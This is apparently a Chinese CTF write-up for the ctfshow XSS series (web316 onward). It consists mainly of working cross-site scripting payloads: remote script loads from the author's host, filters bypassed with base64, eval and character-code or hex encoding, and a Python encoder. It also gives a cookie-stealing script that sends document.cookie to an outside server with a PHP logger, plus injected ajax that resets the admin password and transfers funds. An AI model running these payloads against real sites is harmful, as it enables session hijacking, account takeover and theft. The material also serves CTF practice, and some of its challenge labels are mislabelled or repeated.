[CTFSHOW]XSS入门(佛系记录)

文章目录

• ​​前言​​
• ​​web316​​
• ​​web317-319​​
• ​​前面某些题梭哈​​
• ​​web320​​
• ​​web321​​
• ​​web322-324过滤了;​​
• ​​web325过滤了.​​
• ​​前面那个String.fromCharCode生产payload​​
• ​​web327​​
• ​​web328​​
• ​​web329​​
• ​​web320​​
• ​​web331​​
• ​​web322-323​​
• ​​参考链接​​

前言

以下需要师父们自己url解码哦，然后大部分使用了xss平台盲打连接最下方也有，过滤空格用/，师傅们注意这可能不是一篇WP，我之前忘记备份了呜呜，凑合着用一下，相关原理自己琢磨下

web316

​​http://e6e20854-17e6-4e0e-9f6f-b3c7e176250c.chall.ctf.show/?msg=%3Cscript+src%3D%22http%3A%2F%2Fy4tacker.top%2Fhack.js%22%3E%3C%2Fscript%3E​​

web317-319

​​http://35ac8af3-3eaa-4b9c-98cc-0b78d38e6706.chall.ctf.show/?msg=%3Cinput+onfocus%3Deval%28atob%28this.id%29%29+id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHA6Ly95NHRhY2tlci50b3AvaGFjay5qcyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs%3D+autofocus%3E​​

前面某些题梭哈

<input οnfοcus=eval（atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzOC5jYy8ySEpJIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>

web320

​​http://cc9e301d-d32a-4540-932a-6cd28d5d5acc.chall.ctf.show/?msg=<body/οnlοad=“document.write(String.fromCharCode(32,60,115,67,114,73,112,116,32,115,114,67,61,47,47,120,115,46,115,98,47,89,84,85,104,62,60,47,115,67,82,105,112,84,62));”​​

web321

​​http://cc9e301d-d32a-4540-932a-6cd28d5d5acc.chall.ctf.show/?msg=<body/οnlοad=“document.write(String.fromCharCode(32));document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(114));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(89));document.write(String.fromCharCode(84));document.write(String.fromCharCode(85));document.write(String.fromCharCode(104));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));”​​

web322-324过滤了;

<body/οnlοad=‘document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(114));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(89));document.write(String.fromCharCode(84));document.write(String.fromCharCode(85));document.write(String.fromCharCode(104));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));’>

web325过滤了.

<body/οnlοad=eval（"\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x33\x32\x2c\x31\x31\x35\x2c\x31\x31\x34\x2c\x36\x37\x2c\x36\x31\x2c\x34\x37\x2c\x34\x37\x2c\x31\x32\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x31\x31\x35\x2c\x39\x38\x2c\x34\x37\x2c\x38\x39\x2c\x38\x34\x2c\x38\x35\x2c\x31\x30\x34\x2c\x36\x32\x2c\x36\x30\x2c\x34\x37\x2c\x31\x31\x35\x2c\x36\x37\x2c\x38\x32\x2c\x31\x30\x35\x2c\x31\x31\x32\x2c\x38\x34\x2c\x36\x32\x29\x29\x3b")>
web326过滤了括号
<body/οnlοad=eval（"\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x33\x32\x2c\x31\x31\x35\x2c\x31\x31\x34\x2c\x36\x37\x2c\x36\x31\x2c\x34\x37\x2c\x34\x37\x2c\x31\x32\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x31\x31\x35\x2c\x39\x38\x2c\x34\x37\x2c\x38\x39\x2c\x38\x34\x2c\x38\x35\x2c\x31\x30\x34\x2c\x36\x32\x2c\x36\x30\x2c\x34\x37\x2c\x31\x31\x35\x2c\x36\x37\x2c\x38\x32\x2c\x31\x30\x35\x2c\x31\x31\x32\x2c\x38\x34\x2c\x36\x32\x29\x29\x3b")>

前面那个String.fromCharCode生产payload

a= "<sCrIpt srC=//xs.sb/YTUh></sCRipT>"
res = ''
res2 = ''
for i in a:
  tmp = ord(i)
  res += str(tmp)
  res+=","
  res2 +=f"document.write(String.fromCharCode({str(tmp)}));"
# print(res)
# print(res2)

a = "646f63756d656e742e777269746528537472696e672e66726f6d43686172436f64652836302c3131352c36372c3131342c37332c3131322c3131362c33322c3131352c3131342c36372c36312c34372c34372c3132302c3131352c34362c3131352c39382c34372c38392c38342c38352c3130342c36322c36302c34372c3131352c36372c38322c3130352c3131322c38342c363229293b"
z = 0
res = ''
for i in a:
  if z ==2:
    z=0
  if z ==0:
    res+=r"\x"
  res += i
  z+=1
print(res)

web327

注意收件人是admin,无过滤

web328

自己搭建,主要是偷管理员的cookie
写一个js

var img = new Image();
img.src = "http://y4tacker.top/index.php?q="+document.cookie
document.body.append(img);

下面是index.php

<?php 
  $cookie = $_GET['q'];
  $myFile = "cookie.txt";
  file_put_contents($myFile, $cookie, FILE_APPEND);
?>

注册​​<script src=你的js地址></script>​​ 之后把这个cookie替换掉浏览器里面本身的，访问用户管理页面就可以了

web329

从这道题以后，群主设置了把cookie发送给你之前就让它失效了，所以换一个思路获取页面元素
自己搭建

var img = new Image();
 img.src = “http://y4tacker.top/index.php?q=”+document.querySelector(’#top > div.layui-container > div:nth-child(4) > div > div.layui-table-box > div.layui-table-body.layui-table-main’).textContent;
 document.body.append(img); <?php $cookie = $_GET['q']; $myFile = "cookie.txt"; file_put_contents($myFile, $cookie, FILE_APPEND); ?>

web320

通过上一道题发现密码是admin*******所以改密码吧
 $.ajax({url:“http://127.0.0.1/api/change.php?p=111111”,success:function(result){}});

web331

$.ajax({
 url: “http://127.0.0.1/api/change.php”,
 method: “POST”,
 data:{
 ‘p’:‘111111’
 },
 cache: false,
 success: function(res){}});

web322-323

一个是get请求，一个是post请求，payload类似web331，主要是向admin那里转账到自己注册的新号，然后去买flag就行了，当然你们可以发现题目其实有个小漏洞，自己向自己转钱钱也还会越来越多

好吧考虑到大家水平我把这道题发个payload,两道题分别是get和post，我们知道jquery的这个ajax不能携带cookie请求，所以有点麻烦，但是如果是本地请求就刚好绕过了这一点，我们先创建一个号​​<script src=我自己的js利用脚本内容是下面这个></script>​​​（记得映射公网），之后登陆退出后，再创建一个名为​​y4tacker​​坐等收钱

$.ajax({
                url: "http://127.0.0.1/api/amount.php",
                method: "POST",
                data:{
                    'u':'y4tacker',
                    'a':10000
                },
                cache: false,
                success: function(res){
                    
            }});

参考链接

​​https://www.cnblogs.com/hookjoy/p/6181350.html​​ xss平台：https://xsshs.cn/